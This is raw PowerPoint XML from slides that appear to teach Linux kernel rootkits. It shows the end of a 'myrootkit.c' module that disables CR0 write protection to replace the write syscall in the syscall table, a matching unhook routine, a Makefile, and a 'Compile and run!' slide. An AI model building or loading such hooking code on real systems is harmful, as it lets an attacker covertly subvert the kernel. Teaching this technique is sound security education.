                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>= (void *)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>NR_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>NR_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>] = (unsigned long) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>new_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  // re-enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>write protection, flip bit 16 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(read_cr0 () | 0x10000); return 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>tatic void __exit bye(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(read_cr0 () &amp; (~ 0x10000)); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>NR_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>] = (unsigned long)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>original_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(read_cr0 () | 0x10000); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(KERN_ALERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"MODULE EXIT\n"); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1629847027"/>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8901"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrootkit.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144684" y="1024099"/>
            <a:ext cx="8854632" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>//…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>odule_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init_rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>module_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(bye);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/******** end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>myrootkit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>akefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> *******/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>-m += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>myrootkit.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>-C /lib/modules/$(shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> -r)/build M=$(PWD) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>-C /lib/modules/$(shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> -r)/build M=$(PWD) clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598208466"/>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Compile and run!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
